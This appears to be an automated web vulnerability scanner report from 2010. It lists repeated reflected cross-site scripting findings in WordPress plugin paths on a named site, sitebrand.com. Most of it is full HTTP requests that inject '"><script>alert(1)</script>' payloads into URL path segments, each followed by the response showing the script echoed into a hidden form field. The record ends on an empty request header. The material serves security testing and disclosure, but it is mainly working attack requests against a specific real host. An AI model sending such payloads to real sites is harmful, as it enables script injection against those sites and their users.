GET /wp-content/plugins/slidedeck-lite-for-wordpressfe0bc"><script>alert(1)</script>69c5d7af925/lib/wordpress-plugin.skin.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpressfe0bc\"><script>alert(1)</script>69c5d7af925/lib/wordpress-plugin.skin.css" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bd7"><script>alert(1)</script>847e7d556d0 was submitted in the REST URL parameter 4. This input was echoed as 67bd7\"><script>alert(1)</script>847e7d556d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/slidedeck-lite-for-wordpress/lib67bd7"><script>alert(1)</script>847e7d556d0/wordpress-plugin.skin.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:38 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/lib67bd7\"><script>alert(1)</script>847e7d556d0/wordpress-plugin.skin.css" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f461"><script>alert(1)</script>2aabf40500e was submitted in the REST URL parameter 5. This input was echoed as 6f461\"><script>alert(1)</script>2aabf40500e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css6f461"><script>alert(1)</script>2aabf40500e HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:40 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css6f461\"><script>alert(1)</script>2aabf40500e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5dd"><script>alert(1)</script>adde4188ba1 was submitted in the REST URL parameter 1. This input was echoed as cb5dd\"><script>alert(1)</script>adde4188ba1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentcb5dd"><script>alert(1)</script>adde4188ba1/plugins/tabbed-widgets/css/tabbed-widgets.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:34 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-contentcb5dd\"><script>alert(1)</script>adde4188ba1/plugins/tabbed-widgets/css/tabbed-widgets.css" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f82aa"><script>alert(1)</script>23d2246834 was submitted in the REST URL parameter 2. This input was echoed as f82aa\"><script>alert(1)</script>23d2246834 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsf82aa"><script>alert(1)</script>23d2246834/tabbed-widgets/css/tabbed-widgets.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/pluginsf82aa\"><script>alert(1)</script>23d2246834/tabbed-widgets/css/tabbed-widgets.css" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ead5d"><script>alert(1)</script>e448c2dae68 was submitted in the REST URL parameter 3. This input was echoed as ead5d\"><script>alert(1)</script>e448c2dae68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgetsead5d"><script>alert(1)</script>e448c2dae68/css/tabbed-widgets.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:37 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgetsead5d\"><script>alert(1)</script>e448c2dae68/css/tabbed-widgets.css" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 785fb"><script>alert(1)</script>20df5decad1 was submitted in the REST URL parameter 4. This input was echoed as 785fb\"><script>alert(1)</script>20df5decad1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/css785fb"><script>alert(1)</script>20df5decad1/tabbed-widgets.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:39 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/css785fb\"><script>alert(1)</script>20df5decad1/tabbed-widgets.css" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f1a3"><script>alert(1)</script>a9f182a0a62 was submitted in the REST URL parameter 5. This input was echoed as 7f1a3\"><script>alert(1)</script>a9f182a0a62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css7f1a3"><script>alert(1)</script>a9f182a0a62 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/css/tabbed-widgets.css7f1a3\"><script>alert(1)</script>a9f182a0a62" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb7d"><script>alert(1)</script>33e42537cc6 was submitted in the REST URL parameter 1. This input was echoed as 7eb7d\"><script>alert(1)</script>33e42537cc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content7eb7d"><script>alert(1)</script>33e42537cc6/plugins/tabbed-widgets/js/jquery-cookie.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content7eb7d\"><script>alert(1)</script>33e42537cc6/plugins/tabbed-widgets/js/jquery-cookie.min.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d419"><script>alert(1)</script>497788cc897 was submitted in the REST URL parameter 2. This input was echoed as 3d419\"><script>alert(1)</script>497788cc897 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins3d419"><script>alert(1)</script>497788cc897/tabbed-widgets/js/jquery-cookie.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins3d419\"><script>alert(1)</script>497788cc897/tabbed-widgets/js/jquery-cookie.min.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 403c1"><script>alert(1)</script>8f85f524614 was submitted in the REST URL parameter 3. This input was echoed as 403c1\"><script>alert(1)</script>8f85f524614 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets403c1"><script>alert(1)</script>8f85f524614/js/jquery-cookie.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:38 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets403c1\"><script>alert(1)</script>8f85f524614/js/jquery-cookie.min.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed152"><script>alert(1)</script>fc9de5f9c8a was submitted in the REST URL parameter 4. This input was echoed as ed152\"><script>alert(1)</script>fc9de5f9c8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/jsed152"><script>alert(1)</script>fc9de5f9c8a/jquery-cookie.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:40 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/jsed152\"><script>alert(1)</script>fc9de5f9c8a/jquery-cookie.min.js" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75ae9"><script>alert(1)</script>d8f6f0d1bd3 was submitted in the REST URL parameter 5. This input was echoed as 75ae9\"><script>alert(1)</script>d8f6f0d1bd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js75ae9"><script>alert(1)</script>d8f6f0d1bd3 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:43 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js75ae9\"><script>alert(1)</script>d8f6f0d1bd3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6201e"><script>alert(1)</script>056c72dfbd7 was submitted in the REST URL parameter 1. This input was echoed as 6201e\"><script>alert(1)</script>056c72dfbd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content6201e"><script>alert(1)</script>056c72dfbd7/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content6201e\"><script>alert(1)</script>056c72dfbd7/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d19f"><script>alert(1)</script>9641c2566cb was submitted in the REST URL parameter 2. This input was echoed as 9d19f\"><script>alert(1)</script>9641c2566cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins9d19f"><script>alert(1)</script>9641c2566cb/tabbed-widgets/js/jquery-ui-accordion.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins9d19f\"><script>alert(1)</script>9641c2566cb/tabbed-widgets/js/jquery-ui-accordion.min.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87c4"><script>alert(1)</script>c49927ebe9 was submitted in the REST URL parameter 3. This input was echoed as a87c4\"><script>alert(1)</script>c49927ebe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgetsa87c4"><script>alert(1)</script>c49927ebe9/js/jquery-ui-accordion.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:38 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgetsa87c4\"><script>alert(1)</script>c49927ebe9/js/jquery-ui-accordion.min.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3366e"><script>alert(1)</script>19c0b7c3a1a was submitted in the REST URL parameter 4. This input was echoed as 3366e\"><script>alert(1)</script>19c0b7c3a1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/js3366e"><script>alert(1)</script>19c0b7c3a1a/jquery-ui-accordion.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:40 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js3366e\"><script>alert(1)</script>19c0b7c3a1a/jquery-ui-accordion.min.js" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44034"><script>alert(1)</script>0cb6d32e4c4 was submitted in the REST URL parameter 5. This input was echoed as 44034\"><script>alert(1)</script>0cb6d32e4c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
